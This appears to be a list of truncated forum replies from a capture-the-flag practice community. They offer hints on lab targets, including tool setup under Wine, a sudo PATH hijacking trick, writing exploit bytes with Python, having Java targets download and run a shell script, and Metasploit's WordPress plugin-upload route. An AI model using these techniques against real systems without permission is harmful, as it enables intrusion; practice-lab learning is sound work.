At least, I'm not aware of anyone who solved it with Linux/MacOS. If I remember correctly, the required tools don't work with the *NIX-variant of "the framework", and I also didn't get it to work unde…
I played around with wine and the required tools, but couldn't really get them to run the way they worked on Windows:
* the latest release of y_______l.n__ refuses to work under wine and mono, and instead crashes with unhandled exceptions. One migh…
Due to the technology in use, you will need to use Windows. Though I haven’t tried if it’s possible to use the exploit from within Wine. So, it might be worth to try. I might check, tonight, when I’m at my PC.
As Taz already mentioned: Having a spare hardware device is your best choice.
To gather initial information about the USB stick, I can suggest using usblock: https://github.com/cddmp/usblock
When usblock is running, and you insert any USB device, it…
There is no authentication required for this part. I've just checked the part you are stuck at from within my CTF Kali VM and can enumerate just fine.
Maybe you can try switching to another server instance or VPN zone, as you already ruled out (acti…
You are on the right track, and this is basically the way to go. In the beginning, it requires a slight twist, though.
Do you already know what other internal resources there might be?
Just an assumption:
Many websites/CMSes/blog-engines automatically convert "straight" quotes to “typographic” quotes. And those are completely different characters which bash (or your shell in general) handles differ…
You would need to change the PATH for the sudo environment, not for the sudo call:
Not: PATH=bla sudo ...
But: sudo PATH=bla ...
But AFAIK, this was explicitly forbidden by the sudo config.
For trying out new OSes, I highly suggest using virtual machines. They allow to set snapshots, so that you can completely brick the system, and always can go back to a clean state without having to reinstall the whole system.
Since you want to…
IKR. Wondering why the "ping back" for foothold rarely works, while the other reply comes back in a somewhat timely manner. Got it working once and know the user, but now it failed for the last 20 (or so) attempts…
It's a tad bit clunky, but you need to use the stdout buffer:
python3 -c "import sys; sys.stdout.buffer.write(b'A'*5 + b'\xde\xad\xc0\xde')" | xxd00000000: 4141 4141 41de adc0 de AAAAA....
When using pwntools, you usual…
Well, yes and no. Java in particular (but also other server-side languages in general) doesn't like complex payloads. Often, it is better to download (and then execute) a shellscript to the target machine, and make the scrip…
Haven't looked into the code, but it's most likely possible via the xmprpc.php endpoint. But it might as well be that MSF just does the whole:
* log into wp-admin
* grab CSRF token for plugins upload
* upload plugin
* activate p…
As always with Java in particular (but also other server-side languages in general): Don't try to build too complex payloads. Often, it is better to download (and then execute) a shellscript to the target machine, and make …